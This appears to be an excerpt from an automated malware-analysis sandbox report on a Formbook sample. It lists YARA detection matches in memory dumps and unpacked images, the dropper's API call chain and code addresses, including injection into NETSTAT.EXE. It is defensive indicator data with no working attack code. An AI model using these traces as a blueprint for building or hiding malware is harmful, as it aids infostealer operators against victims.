          Source: 2.2.sfxwkrzgst.exe.2730000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.0.sfxwkrzgst.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.sfxwkrzgst.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.sfxwkrzgst.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.sfxwkrzgst.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.335402219.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.335402219.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.512366000.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.512366000.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.252192070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.252192070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.284289217.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.284289217.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.256509759.0000000002730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.256509759.0000000002730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.298993321.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.298993321.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.335351596.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.335351596.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4505682666.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 4.0.sfxwkrzgst.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.sfxwkrzgst.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.sfxwkrzgst.exe.2730000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.sfxwkrzgst.exe.2730000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.sfxwkrzgst.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.sfxwkrzgst.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.sfxwkrzgst.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.sfxwkrzgst.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.sfxwkrzgst.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.sfxwkrzgst.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.sfxwkrzgst.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.sfxwkrzgst.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.sfxwkrzgst.exe.2730000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.sfxwkrzgst.exe.2730000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.sfxwkrzgst.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.sfxwkrzgst.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.sfxwkrzgst.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.sfxwkrzgst.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.335402219.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.335402219.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.512366000.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.512366000.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.252192070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.252192070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.284289217.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.284289217.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.256509759.0000000002730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.256509759.0000000002730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.298993321.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.298993321.000000000711A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.335351596.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.335351596.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\4505682666.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
          Source: C:\Users\user\Desktop\4505682666.exeCode function: 0_2_00406BFE0_2_00406BFE
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 2_2_02720A3A2_2_02720A3A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0041D0114_2_0041D011
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_004010294_2_00401029
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_004010304_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0041C9D94_2_0041C9D9
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0041C30F4_2_0041C30F
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0041CC424_2_0041CC42
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0041BC534_2_0041BC53
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_00408C804_2_00408C80
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_00402D874_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_00402D904_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_00402FB04_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C41204_2_012C4120
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AF9004_2_012AF900
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C99BF4_2_012C99BF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0137E8244_2_0137E824
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA8304_2_012CA830
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013610024_2_01361002
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D20A04_2_012D20A0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013720A84_2_013720A8
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012BB0904_2_012BB090
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013728EC4_2_013728EC
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01372B284_2_01372B28
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA3094_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CAB404_2_012CAB40
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0134CB4F4_2_0134CB4F
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DEBB04_2_012DEBB0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D138B4_2_012D138B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013523E34_2_013523E3
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136DBD24_2_0136DBD2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013603DA4_2_013603DA
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DABD84_2_012DABD8
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB2364_2_012CB236
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0135FA2B4_2_0135FA2B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013722AE4_2_013722AE
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01364AEF4_2_01364AEF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A0D204_2_012A0D20
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01372D074_2_01372D07
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01371D554_2_01371D55
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D25814_2_012D2581
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01362D824_2_01362D82
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012BD5E04_2_012BD5E0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013725DD4_2_013725DD
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B841F4_2_012B841F
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136D4664_2_0136D466
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB4774_2_012CB477
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013644964_2_01364496
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01371FF14_2_01371FF1
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0137DFCE4_2_0137DFCE
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C6E304_2_012C6E30
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136D6164_2_0136D616
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01372EF74_2_01372EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D14AEF15_2_02D14AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D222AE15_2_02D222AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D0FA2B15_2_02D0FA2B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D1DBD215_2_02D1DBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D103DA15_2_02D103DA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C8ABD815_2_02C8ABD8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D023E315_2_02D023E3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C8EBB015_2_02C8EBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7AB4015_2_02C7AB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A30915_2_02C7A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D22B2815_2_02D22B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D228EC15_2_02D228EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C6B09015_2_02C6B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C820A015_2_02C820A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D220A815_2_02D220A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D1100215_2_02D11002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D2E82415_2_02D2E824
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7A83015_2_02C7A830
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C799BF15_2_02C799BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C5F90015_2_02C5F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7412015_2_02C74120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D22EF715_2_02D22EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D1D61615_2_02D1D616
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C76E3015_2_02C76E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D2DFCE15_2_02D2DFCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D21FF115_2_02D21FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D1449615_2_02D14496
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C7B47715_2_02C7B477
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D1D46615_2_02D1D466
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C6841F15_2_02C6841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D225DD15_2_02D225DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C6D5E015_2_02C6D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C8258115_2_02C82581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D12D8215_2_02D12D82
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D21D5515_2_02D21D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02D22D0715_2_02D22D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_02C50D2015_2_02C50D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_0043C9D915_2_0043C9D9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_0043CC4215_2_0043CC42
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 15_2_0043BC5315_2_0043BC53
